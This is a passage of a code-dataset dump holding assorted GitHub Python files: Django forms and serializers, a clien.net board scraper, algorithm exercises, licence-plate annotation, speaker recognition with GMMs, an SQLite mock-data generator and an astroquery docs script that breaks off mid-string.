Request\n\n\nclass RequestSerializer(serializers.ModelSerializer):\n class Meta:\n model = Request\n fields = ('id', 'date', 'method', 'endpoint', 'response_code',\n 'exec_time', 'remote_address', 'body_request',)\n","repo_name":"gurupratap-matharu/midware","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33911856700","text":"#!/usr/bin/env python3\nfrom urllib.request import Request, urlopen\nimport urllib.error\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime as dtime\nfrom datetime import timedelta\nimport os\nimport re\nimport sys\nimport time\nimport threading, time\nimport pandas as pd\n\n__version__ = 'v1.00'\nboardUrl = \"https://www.clien.net/service/board/park/\"\n\ndefaultFile = 'default.csv'\ncheckName = os.path.dirname(os.path.realpath(__file__)) + '/' + defaultFile \nmutexFile = os.path.dirname(os.path.realpath(__file__)) + '/mutexFile'\n\ndefaultId = 13351150 # the post ID to start from; must be set manually\n\nbuzzCheckDuration = 360 #in minutes; how long to wait after a post is created\n\ndef getMutex():\n with open(mutexFile, 'r') as f:\n line = f.readline()\n if 'FALSE' in line:\n pass\n else:\n print(\"Failed to get mutex. File was already locked.\")\n return False\n\n with open(mutexFile, 'w') as f:\n f.write(str(os.getpid()))\n\n with open(mutexFile, 'r') as f:\n line = int(f.readline())\n if line == os.getpid():\n pass\n else:\n print(\"Failed to get mutex. 
Another process just locked.\")\n return False\n \n return True\n \ndef releaseMutex():\n with open(mutexFile, 'w') as f:\n f.write('FALSE')\n \ndef getNowTime():\n nowTime = dtime.now()\n return nowTime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef getLastedIdFromCsvFile(csvFile):\n #print(\"we got %s\" % (csvFile))\n count=len(open(csvFile).readlines()) \n csvData = pd.read_csv(csvFile, skiprows=range(1,count-1))\n return int(csvData[ [\"id\"] ].values)\n\ndef getDate():\n nowTime = dtime.now()\n return nowTime.strftime(\"%Y-%m-%d\")\n\ndef getBsObj(addr):\n try:\n req = Request(addr, headers={'User-Agent': 'Mozilla/5.0'})\n except urllib.error.HTTPError as e:\n print(\"HTTP Error\")\n data = None\n except urllib.error.URLError as e:\n print(\"URLError Error\")\n data = None\n else:\n data = True\n \n if data is None:\n return data\n \n try:\n html = urlopen(req).read().decode('utf-8','replace')\n except urllib.error.HTTPError as e:\n print(\"HTTP Error\")\n data = None\n except urllib.error.URLError as e:\n print(\"URLError Error\")\n data = None\n else:\n data = BeautifulSoup(html, \"html.parser\")\n \n return data\n\ndef getLastId():\n # a. check for a csv file named by date; if it exists, read the ID of its last row\n # b. if the file does not exist, use defaultId (set manually)\n \n if(os.path.isfile(checkName)):\n lastId = getLastedIdFromCsvFile(checkName)\n else:\n print(\"There is no %s.\" % (checkName))\n lastId = defaultId\n\n return lastId\n\ndef getInfoBoard(id):\n # Which board fields to fetch\n # 1. post title - post_title\n # 2. posting time - post_time\n # 3. comment count - post_reply\n # 4. likes - symph_count\n # 5. view count - view_count\n targetUrl = boardUrl+str(id)\n\n check_time = dtime.now()\n\n bsObj = getBsObj(targetUrl)\n if bsObj is None:\n return None\n \n #print(\"boObj : %s\" % (bsObj))\n bsObj = bsObj.find('div', attrs={'class' : 'content_view'})\n if bsObj is None:\n return None\n #print(\"post_id : %d\" % (id))\n\n post_title = bsObj.find('h3', attrs={'class' : 'post_subject'}).get_text()\n post_title= post_title.replace('\\n', ' ').replace('\\r', '')\n #print(\"post_title : %s\" % (post_title))\n\n post_symph = bsObj.find('div', attrs={'class' : 'post_symph view_symph'})\n if post_symph is None:\n post_symph = 0\n else:\n post_symph = bsObj.find('div', attrs={'class' : 'post_symph view_symph'}).get_text()\n post_symph = (int)(post_symph.replace('\\n', ' ').replace('\\r', ''))\n #print(\"post_symph : %d\" % (post_symph))\n\n post_view = bsObj.find('div', attrs={'class' : 'view_info'}).get_text()\n post_view = (int)(post_view.replace('\\n', ' ').replace('\\r', '').replace(',', ''))\n #print(\"post_view : %d\" % (post_view))\n\n tmp = bsObj.find('div', attrs={'class' : 'post_author'})\n tmp = tmp.find_all('span')\n post_time = (tmp[0].get_text())\n post_time = (post_time.replace('\\n', ' ').replace('\\r', '').replace('\\t', ''))\n post_time = (post_time.strip())\n post_time = post_time[:19]\n # if there is an edit timestamp, drop the trailing part.\n # ex) 2018-12-29 17:19:36 수정일 : 2018-12-29 17:19:41\n post_time = dtime.strptime(post_time, '%Y-%m-%d %H:%M:%S')\n #print(\"post_time : %s\" % post_time)\n\n post_reply= bsObj.find('div', attrs={'class' : 'comment_head'}).get_text()\n post_reply= (post_reply.replace('\\n', ' ').replace('\\r', '').replace(',', ''))\n post_reply= (int)(re.findall('\\d+', post_reply)[0])\n #print(\"post_reply: %d\" % (post_reply))\n\n delta_time = ((check_time - post_time).total_seconds())/60\n\n print(\"This delta_time is %s.\" % delta_time)\n\n result = { \"id\" : [id], \"post_time\" : [post_time], \"check_time\" : [check_time], \"delta_time\" : [delta_time], \"view\" : 
[post_view],\"reply\" : [post_reply], \"symph\" : [post_symph], \"title\" : [post_title] }\n result_df = pd.DataFrame(result)\n return result_df\n\nclass site_scraper():\n def __init__(self):\n self.pdResult = pd.DataFrame(columns=(\"id\", \"post_time\", \"check_time\", \"delta_time\", \"view\", \"reply\", \"symph\", \"title\"))\n\n def scraping(self):\n try:\n self.pdThisId = getInfoBoard(self.boardId)\n except:\n print(\"Unhandled Exception Occurred - scraping\")\n self.pdThisId = None\n\n def concatPd(self):\n self.pdResult = self.pdResult.append(self.pdThisId, ignore_index=True,\n sort=False)\n\n def concatCsvFile(self):\n if os.path.isfile(checkName):\n print(\"File %s exists.\" % checkName)\n csvFileData = pd.read_csv(checkName, index_col=0, header=0)\n #print(self.pdResult)\n csvFileData = csvFileData.append(self.pdResult,\n ignore_index=True, sort=False)\n csvFileData.to_csv(checkName, mode='w')\n else:\n self.pdResult.to_csv(checkName, mode='w')\n\n def checkLongerThan(self):\n \n if self.pdThisId is None:\n return None\n \n post = (self.pdThisId[\"post_time\"].iloc[0])\n check = (self.pdThisId[\"check_time\"].iloc[0])\n deltaMin = timedelta(minutes=buzzCheckDuration)\n deltaTime = post+deltaMin\n\n if check > deltaTime:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n print(\"\\n[Start][%s] %s %s [pid:%d] is going to work.\"\n % (getNowTime(),os.path.realpath(__file__),__version__,os.getpid()))\n\n if(getMutex()):\n pass\n else:\n sys.exit()\n\n keepGoing = True\n lastId = getLastId()\n httpError = 0\n scraper = site_scraper()\n\n while keepGoing:\n # Step 1. determine the post ID\n # a. check for a csv file named by date; if it exists, read the ID of its last row\n # b. if the file does not exist, initialize from the first current post (start from now)\n thisId = lastId + 1\n print(\"\\nThis id : %d - [%s]\" % (thisId, getNowTime()))\n scraper.boardId = thisId\n\n # Step 2. read and check the post with ID + 1\n # a. if it is older than the configured duration (e.g. 6 hours), save its info to csv\n # b. if it is not past the configured duration, exit as is\n scraper.scraping()\n\n ret = scraper.checkLongerThan()\n if ret is None:\n print(\"Id : %d is HTTPError 404 or was deleted by the web manager..\" % thisId)\n httpError = httpError + 1\n if httpError > 30:\n print(\"httpError count is %d. 
We're going out.\" % httpError)\n keepGoing = False\n elif ret:\n print(\"Id : %d is longer than buzzCheckDuration.\" % thisId)\n scraper.concatPd()\n httpError = 0\n else:\n print(\"Id : %d is shorter than buzzCheckDuration.\" % thisId)\n keepGoing = False\n \n lastId = thisId\n\n scraper.concatCsvFile()\n\n print(\"[End][%s] main function is going out.\" % getNowTime())\n\n releaseMutex()\n sys.exit()\n","repo_name":"devinlife/buzz_clien_appendix","sub_path":"11_top100_project/01_happen_yesterday.py","file_name":"01_happen_yesterday.py","file_ext":"py","file_size_in_byte":8331,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"73962232053","text":"from django import forms\n\nfrom .models import User, Vacation\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n \"\"\"Form for the profile page\"\"\"\n email = forms.EmailField(label=\"E-MAIL\")\n\n class Meta:\n model = User\n fields = [\"first_name\", \"last_name\", \"email\", \"position\"]\n\n\nclass VacationUpdateForm(forms.ModelForm):\n \"\"\"Form for the vacation page\"\"\"\n vacation_date_start = forms.DateField(\n label=\"Начало отпуска\",\n widget=forms.DateInput(attrs={\"class\": \"form-control\", \"type\": \"date\"}),\n )\n vacation_date_end = forms.DateField(\n label=\"Конец отпуска\",\n widget=forms.DateInput(attrs={\"class\": \"form-control\", \"type\": \"date\"}),\n )\n\n class Meta:\n model = Vacation\n fields = [\"vacation_date_start\", \"vacation_date_end\"]\n\n def clean(self):\n # Define the validation rule\n if self.cleaned_data.get(\"vacation_date_end\") < self.cleaned_data.get(\n \"vacation_date_start\"\n ):\n raise forms.ValidationError(\n \"Дата окончания отпуска должна быть больше даты начала\"\n )\n return self.cleaned_data\n","repo_name":"LevityLoveLight/django_crm_test_project","sub_path":"vacation_service/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31353214783","text":"#Given: Two DNA strings s and t of equal length\r\n#Return: The Hamming distance dH(s,t)\r\n\r\ndef calcpoints(seq1, seq2):\r\n \"\"\"Counts symbol substitutions between 2 strings (Hamming distance)\"\"\"\r\n\r\n count = 0\r\n \r\n for ind in range(len(seq1)):\r\n if seq1[ind] != seq2[ind]:\r\n count += 1\r\n \r\n return count\r\n\r\nwith open('../Files/rosalind_bio_HAMM.txt', 'r') as myfile:\r\n strands = myfile.read().splitlines()\r\n\r\ns = strands[0]\r\nt = strands[1]\r\n\r\nprint(calcpoints(s, t))\r\n","repo_name":"agolikova/Rosalind-Bioinformatics-Solutions","sub_path":"Code/HAMM_Counting point mutations.py","file_name":"HAMM_Counting point mutations.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33790836295","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" # Or 2, 3, etc. 
other than 0\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig = tf.ConfigProto(\n gpu_options=tf.GPUOptions(\n visible_device_list=\"0\", # specify GPU number\n allow_growth=True\n )\n)\nconfig.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU\nsess = tf.Session(config=config)\nset_session(sess) # set this TensorFlow session as the default session for Keras\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom local_utils import detect_lp\nfrom os.path import splitext,basename\nfrom keras.models import model_from_json,load_model\nimport glob\nimport time\nimport os\n\n\ndef load_model_(path):\n try:\n path = splitext(path)[0]\n with open('%s.json' % path, 'r') as json_file:\n model_json = json_file.read()\n model = model_from_json(model_json, custom_objects={})\n model.load_weights('%s.h5' % path)\n print(\"Loading model successfully...\")\n return model\n except Exception as e:\n print(e)\n\ndef get_plate(image_path, Dmax=608, Dmin=256,lp_threshold=0.5):\n vehicle = preprocess_image(image_path)\n ratio = float(max(vehicle.shape[:2])) / min(vehicle.shape[:2])\n side = int(ratio * Dmin)\n bound_dim = min(side, Dmax)\n _ , LpImg, _, cor = detect_lp(wpod_net, vehicle, bound_dim, lp_threshold)\n return LpImg, cor\n\ndef preprocess_image(image_path,resize=False):\n img = cv2.imread(image_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = img / 255\n if resize:\n img = cv2.resize(img, (224,224))\n return img\n\ndef draw_box(image_path, cor, thickness=3): \n vehicle_image = cv2.imread(image_path)\n vehicle_image = cv2.cvtColor(vehicle_image, cv2.COLOR_BGR2RGB)\n\n for k in range(len(cor)):\n pts=[] \n x_coordinates=cor[k][0]\n y_coordinates=cor[k][1]\n # store the top-left, top-right, bottom-left, bottom-right \n # of the plate license respectively\n for i in range(4):\n pts.append([int(x_coordinates[i]),int(y_coordinates[i])])\n \n pts = np.array(pts, np.int32)\n pts = pts.reshape((-1,1,2))\n print(pts)\n # vehicle_image = preprocess_image(image_path)\n \n cv2.polylines(vehicle_image,[pts],True,(0,255,0),thickness)\n return vehicle_image\n\nif __name__ == \"__main__\":\n wpod_net_path = \"pyscripts/wpod-net.json\"\n wpod_net = load_model_(wpod_net_path)\n print(wpod_net.summary())\n\n\n # Create a list of image paths \n image_paths = glob.glob(\"train_data/self_taken/*\")\n print(\"Found %i images...\"%(len(image_paths)))\n base_save_dir=\"./train_data/processed\"\n os.makedirs(base_save_dir,exist_ok=True)\n\n for test_image in image_paths:\n # Obtain plate image and its coordinates from an image\n print(\"-\"*40)\n print(test_image)\n image = cv2.imread(test_image)\n try:\n LpImg,cor = get_plate(test_image,lp_threshold=0.5)\n except Exception as e:\n print(e)\n continue\n labeled_image=draw_box(test_image,cor)\n x_coordinates=cor[0][0]\n y_coordinates=cor[0][1]\n print(\"Detect %i plate(s) in\"%len(LpImg),splitext(basename(test_image))[0])\n print(\"x Coordinate:\",x_coordinates)\n print(\"y Coordinate:\",y_coordinates)\n base_name=splitext(basename(test_image))[0]\n ext=test_image.split(\".\")[-1]\n\n #save\n print(os.path.join(base_save_dir,base_name+\".\"+ext))\n cv2.imwrite(os.path.join(base_save_dir,base_name+\".\"+ext),image)\n cv2.imwrite(os.path.join(base_save_dir,base_name+\"_detect.\"+ext),labeled_image[:,:,::-1])\n \n # save y (coordinate 1st row x , 2nd row y) as txt\n path_w = os.path.join(base_save_dir,base_name+\".txt\")\n with open(path_w, mode='w') as 
f:\n f.write(','.join(x_coordinates.astype(np.int).astype(str).tolist()))\n f.write('\\n')\n f.write(','.join(y_coordinates.astype(np.int).astype(str).tolist()))\n # Visualize our result\n # plt.figure(figsize=(12,5))\n # plt.subplot(1,2,1)\n # plt.axis(False)\n # plt.imshow(preprocess_image(test_image))\n # plt.subplot(1,2,2)\n # plt.axis(False)\n # plt.imshow(LpImg[0])\n\n # plt.figure(figsize=(8,8))\n # plt.axis(False)\n # plt.imshow(draw_box(test_image,cor))\n\n # plt.show()\n # plt.close()\n","repo_name":"MassSkt/js-licence-plate-recognition","sub_path":"pyscripts/annotate_with_wpodnet.py","file_name":"annotate_with_wpodnet.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29805017388","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='whatsappy',\n version='1.1.0',\n description='Run Whatsapp in Selenium for programmatic access',\n url='https://github.com/DomiDre/whatsappy',\n author='Dominique Dresen',\n author_email='dominiquedresen@gmail.com',\n license=\"MIT License\",\n long_description=readme,\n long_description_content_type='text/markdown',\n install_requires=['selenium'],\n python_requires='>2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n platforms=['Linux'],\n package_dir={'whatsappy': 'whatsappy'},\n packages=find_packages(\n exclude=(\n '_build',\n 'docs',\n '_static',\n '_templates',\n 'tests',\n 'examples'\n )\n ),\n keywords='whatsapp selenium'\n)","repo_name":"DomiDre/whatsappy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31770753722","text":"def manacher(s):\n assert '$' not in s and '^' not in s and '#' not in s\n if s == \"\":\n return (0, 1)\n t = '^#' + '#'.join(s) +'#$'\n\n c = 0\n d = 0\n p = [0] * len(t)\n print(t)\n for i in range(1, len(t)-1):\n # mirror i around the center c\n mirror = 2*c-i\n print(i, c, d)\n # grow the palindrome length centered at i\n p[i] = max(0, min(d-i, p[mirror]))\n\n while t[i+1+p[i]] == t[i-1-p[i]]:\n p[i] += 1\n print(p[i])\n if i + p[i] > d:\n c = i\n d = i + p[i]\n print(p)\n (k, i) = max((p[i], i) for i in range(1, len(t)-1))\n print((k, i))\n return ((i - k)//2, (i+k)//2)\n\n\nprint(manacher(\"aaabaa\"))\n\nprint(manacher(\"abcdedcbcded\"))\n","repo_name":"NeilWangziyu/HighPerformancwAlgorithm","sub_path":"Manacher.py","file_name":"Manacher.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3321407954","text":"import numpy as np\ntry:\n import _pickle as pickle #Python3 support\nexcept:\n import cPickle as pickle#Python2 support\n \ntry:\n from speaker import GMMSet, GMM #Gpu Support\n pass\nexcept:\n print(\"pycaspgmm\")\n import operator\n import numpy as np\n from sklearn.mixture import GaussianMixture as GMM\n class GMMSet(object):\n\n def __init__(self, gmm_order = 32):\n self.gmms = []\n self.gmm_order = gmm_order\n self.y = []\n\n def fit_new(self, x, label):\n self.y.append(label)\n gmm = GMM()\n gmm.fit(x)\n self.gmms.append(gmm)\n \n def fit_multi_instances_same_class(self, x, label):\n \n if label in self.y:\n idx = self.y.index(label)\n gmm = self.gmms[idx]\n gmm.fit(x)\n else: \n self.y.append(label)\n gmm = GMM(n_components=13)\n gmm.fit(x)\n self.gmms.append(gmm)\n def gmm_score(self, 
gmm, x):\n return np.sum(gmm.score(x))\n\n def predict_one(self, x):\n scores = [self.gmm_score(gmm, x) / len(x) for gmm in self.gmms]\n p = sorted(enumerate(scores), key=operator.itemgetter(1), reverse=True)\n result = [(self.y[index], value) for (index, value) in enumerate(scores)]\n p = max(result, key=operator.itemgetter(1))\n return p\n \n \n\n\n\n\n \nclass GMMRec(object):\n\n def __init__(self):\n self.features = []\n self.gmmset = GMMSet()\n self.classes = []\n \n def enroll(self, name, mfcc_vecs):\n mu = np.mean(mfcc_vecs, axis = 0)\n sigma = np.std(mfcc_vecs, axis = 0)\n feature = (mfcc_vecs - mu) / sigma\n feature = feature.astype(np.float32)\n self.features.append(feature)\n self.classes.append(name)\n\n def _get_gmm_set(self):\n return GMMSet()\n\n def train(self):\n self.gmmset = self._get_gmm_set()\n for name, feats in zip(self.classes, self.features):\n self.gmmset.fit_new(feats, name)\n \n def predict(self, mfcc_vecs):\n mu = np.mean(mfcc_vecs, axis = 0)\n sigma = np.std(mfcc_vecs, axis = 0)\n feature = (mfcc_vecs - mu) / sigma\n feature = feature.astype(np.float32)\n return self.gmmset.predict_one(feature)\n \n def dump(self, fname, part = None):\n try:\n with open(fname, 'wb') as f:\n if part is None:\n pickle.dump(self, f, -1)\n else:\n pickle.dump(part, f, -1)\n except:\n with open(fname, 'w') as f:\n if part is None:\n pickle.dump(self, f, -1)\n else:\n pickle.dump(part, f, -1)\n\n @staticmethod\n def load(fname):\n try:\n \n with open(fname, 'rb') as f:\n R = pickle.load(f)\n return R\n except:\n with open(fname, 'r') as f:\n R = pickle.load(f)\n return R\n\n \n","repo_name":"Edresson/Speech2Phone","sub_path":"Paper/Speech2Phone-Experiments/speaker/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"44094814043","text":"import numpy as np\n\n# Define the weights for each characteristic\nunifier_weight = 1.0\nintegrity_weight = 1.5 # Weighs more than other characteristics\naccountability_weight = 1.0\n# ... Add more weights for other characteristics\n\n# Define the scores for each party on each characteristic\nND_unifier_score = 60\nND_integrity_score = 70\nND_accountability_score = 50\n# ... Add more scores for other characteristics\n\nSYRIZA_unifier_score = 50\nSYRIZA_integrity_score = 60\nSYRIZA_accountability_score = 40\n# ... Add more scores for other characteristics\n\n# ... Repeat for other parties\n\n# Calculate the reputation scores by multiplying each characteristic score by its weight and summing up\nND_reputation = unifier_weight * ND_unifier_score + integrity_weight * ND_integrity_score + accountability_weight * ND_accountability_score # + ...\nSYRIZA_reputation = unifier_weight * SYRIZA_unifier_score + integrity_weight * SYRIZA_integrity_score + accountability_weight * SYRIZA_accountability_score # + ...\n# ... 
Repeat for other parties\n\n# Calculate the total reputation scores for all parties\ntotal_reputation = ND_reputation + SYRIZA_reputation # + ...\n\n# Define the poll results\npoll_results = {\n 'ND': 35.0,\n 'SYRIZA': 30.0,\n 'Undecided': 10.0\n}\n\n# Calculate the final results\nfinal_results = {}\nfor party, result in poll_results.items():\n if party == 'Undecided':\n continue\n reputation = ND_reputation if party == 'ND' else SYRIZA_reputation # update this line to fetch the correct reputation for each party\n final_results[party] = result + poll_results['Undecided'] * (reputation / total_reputation) + np.random.normal(0, 1)\n\n# Print the final results\nfor party, result in final_results.items():\n print(f\"{party}: {result}%\")\n","repo_name":"GGeronik/Elections","sub_path":"Undecided Voters.py","file_name":"Undecided Voters.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745888344","text":"import json\nfrom datetime import datetime\nfrom typing import List\n\nfrom janis_assistant.data.dbproviderbase import DbProviderBase\nfrom janis_assistant.data.models.outputs import WorkflowOutputModel\nfrom janis_assistant.utils.dateutils import DateUtil\n\n\nclass OutputDbProvider(DbProviderBase[WorkflowOutputModel]):\n CURRENT_SCHEMA_VERSION = 1\n\n def __init__(self, db, readonly, submission_id):\n super().__init__(\n base_type=WorkflowOutputModel,\n db=db,\n readonly=readonly,\n tablename=\"outputs\",\n scopes={\"submission_id\": submission_id},\n )\n self.submission_id = submission_id\n\n def insert_many(self, outputs: List[WorkflowOutputModel]):\n return self.insert_or_update_many(outputs)\n\n def update_paths(\n self, run_id: str, tag: str, original_path: str, new_path: str, value: any\n ):\n model = WorkflowOutputModel(\n id_=tag,\n submission_id=self.submission_id,\n run_id=run_id,\n original_path=original_path,\n new_path=new_path,\n timestamp=datetime.now(),\n value=value,\n # empty fields\n extension=None,\n is_copyable=None,\n output_folder=None,\n output_name=None,\n secondaries=None,\n )\n self.insert_or_update_many([model])\n\n def upgrade_schema(self, from_version: int):\n # if from_version < 2:\n # self.migrate_to_2()\n return\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/data/providers/outputdbprovider.py","file_name":"outputdbprovider.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"72610800373","text":"import pickle\nfrom infoPermanente import Persona\nclass ListaPersonas:\n\tpersonas=[]\n\tdef __init__(self):\n\t\tlistaDePersonas=open(\"ficheroExterno\",\"ab+\");\n\t\tlistaDePersonas.seek(0);\n\t\ttry:\n\t\t\tself.personas=pickle.load(listaDePersonas);\n\t\t\tprint(\"se cargaron {} personas del fichero externo\".format(len(self.personas)));\n\t\texcept:\n\t\t\tprint(\"el fichero esta vacio\");\n\t\tfinally:\n\t\t\tlistaDePersonas.close();\n\t\t\tdel(listaDePersonas);\n\n\tdef agregarPersonas(self,persona):\n\t\tself.personas.append(persona);\n\n\tdef mostrarPersonas(self):\n\t\tfor i in self.personas:\n\t\t\tprint(i);\n\n\tdef guardarPersonasEnFicheroExterno(self):\n\t\tlistaDePersonas=open(\"ficheroExterno\",\"wb\");\n\t\tpickle.dump(self.personas,listaDePersonas);\n\t\tlistaDePersonas.close();\n\t\tdel(listaDePersonas);\n\n\tdef mostarInfoFicheroExterno(self):\n\t\tprint(\"la informacion del fichero es la siguiente \");\n\n\t\tfor p in 
self.personas:\n\t\t\tprint(p)\n\n\n\nmilista=ListaPersonas()\nmipersona1=Persona(\"Sandra Lopez\",\"Femenino\",40)\nmilista.agregarPersonas(mipersona1)\nmipersona2=Persona(\"Jose Valencia\",\"Masculino\",80)\nmilista.agregarPersonas(mipersona2)\nmilista.mostarInfoFicheroExterno()","repo_name":"jart2222/ArchivoPermanente","sub_path":"ListaPersonas.py","file_name":"ListaPersonas.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197582773","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nN, M, C = map(int, input().split())\n\ngraph = [[] for _ in range(N + 1)]\ndistance = [INF] * (N + 1)\n\nfor _ in range(M):\n X, Y, Z = map(int, input().split())\n graph[X].append((Y, Z))\n\ndef dijkstra_pq(start):\n q = []\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n acc, cur = heapq.heappop(q)\n\n if distance[cur] < acc:\n continue\n\n for adj, d in graph[cur]:\n cost = acc + d\n if cost < distance[adj]:\n distance[adj] = cost\n heapq.heappush(q, (cost, adj))\n\n return distance\n\nlist = dijkstra_pq(C)\n\ncnt = 0\ntime = 0\nfor i in range(1, len(list)):\n if 0 < list[i] < INF:\n cnt += 1\n time = max(time, list[i])\n\nprint(cnt, time)\n\n","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"1. 이코테/chapter 09 (최단 경로)/전보2.py","file_name":"전보2.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21840543577","text":"import time, sqlite3, json, requests\r\nimport datetime\r\nimport random\r\nfrom random_word import RandomWords\r\nimport numpy as np\r\n\r\nnumdays = 24 * 40\r\nNbrCapteur = 8\r\nNbrTypes = 5\r\nNbrStation = 6\r\n\r\nr = RandomWords()\r\n\r\nconn = sqlite3.connect('capteur.db')\r\nc = conn.cursor()\r\nbase = datetime.datetime.today()\r\ndate_list = np.arange(datetime.datetime(2022, 1, 1, 0, 0), datetime.datetime(2023, 12, 12, 23, 0),\r\n datetime.timedelta(hours=1)).astype(datetime.datetime)\r\nc.execute(\"delete from SensorReading;\")\r\nc.execute(\"delete from Sensor;\")\r\nc.execute(\"delete from Station;\")\r\nc.execute(\"delete from SensorTypes;\")\r\nc.execute(\"delete from sqlite_sequence;\");\r\nconn.commit()\r\n\r\nfor i in range(0, NbrTypes):\r\n c.execute(\"insert into SensorTypes (Unit) values (\\\"NbrTypes_%s\\\");\" % (r.get_random_word()))\r\n\r\nfor i in range(0, NbrStation):\r\n c.execute(\"insert into Station (Name) values (\\\"Station_%s\\\");\" % (r.get_random_word()))\r\n\r\nfor i in range(0, NbrCapteur):\r\n mac = \"BC:FF:4D:4\" + str(i) + \":BD:DC\"\r\n query = \"insert into Sensor (Type,DateAdded,Station,Name,MacAdress) values (%s,\\\"%s\\\",%s,\\\"Sensor_%s\\\",\\\"%s\\\");\" % (\r\n random.randint(1, NbrTypes), str(date_list[i]), random.randint(1, NbrStation), r.get_random_word(), str(mac))\r\n c.execute(query)\r\n\r\nz = 0\r\nfor capteur in range(0, 9):\r\n z = random.randint(-10, 10)\r\n for i in range(0, numdays):\r\n c.execute(\"INSERT INTO SensorReading (SensorId,DateAdded,Value) VALUES (%s, \\\"%s\\\",\\\"%s\\\");\" % (\r\n str(capteur + 1), str(date_list[i]), str(z)))\r\n if random.randint(0, 1) == 1:\r\n z += random.randint(0, 10)\r\n else:\r\n z -= random.randint(0, 10)\r\n\r\nconn.commit()\r\n\r\nprint(\"Table SensorTypes:\")\r\nc.execute(\"select * from SensorTypes;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable Station:\")\r\nc.execute(\"select * from 
Station;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable Sensor:\")\r\nc.execute(\"select * from Sensor;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable SensorReading:\")\r\nc.execute(\"select * from SensorReading;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n","repo_name":"JardinsBruyere/Serveur","sub_path":"mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43293479091","text":"import os\nimport pandas as pd\nfrom astroquery.ipac.nexsci.nasa_exoplanet_archive import (\n NasaExoplanetArchive, conf\n)\nfrom tqdm.auto import tqdm\nfrom astropy.utils.data import download_file\nfrom zipfile import ZipFile\n\nconf.cache = True\n\nurls = [\n ('https://docs.google.com/spreadsheets/d/'\n '11Z7B76FXBkEwcGmhp72sC6AQdP8ER8K_eU5RAW8ed2M'\n '/gviz/tq?tqx=out:csv&sheet=owls'),\n ('https://docs.google.com/spreadsheets/d/'\n '11Z7B76FXBkEwcGmhp72sC6AQdP8ER8K_eU5RAW8ed2M'\n '/gviz/tq?tqx=out:csv&sheet=sindices')\n]\n\ndf_owls = pd.read_csv(urls[0])\ndf_sinds = pd.read_csv(urls[1])\n\nfigshare_url = \"https://figshare.com/ndownloader/articles/20480538/versions/3\"\nfigshare_path_tmp = download_file(figshare_url, cache=False)\nfigshare_path = 'docs/owls/targets/figshare_pngs'\n\nwith ZipFile(figshare_path_tmp, 'r') as zip_ref:\n zip_ref.extractall(figshare_path)\n\npage = dict()\n\ntargets_page = f\"\"\"Targets\n=======\n\n.. toctree::\n\n\"\"\"\n\nparams_to_write_out = [\n 'st_teff', 'st_spectype', 'st_rad', 'st_mass', 'st_rotp',\n 'sy_bmag', 'sy_vmag', 'sy_gaiamag'\n]\n\naladin_lite = \"\"\"\n\n \n\n\n \n\n
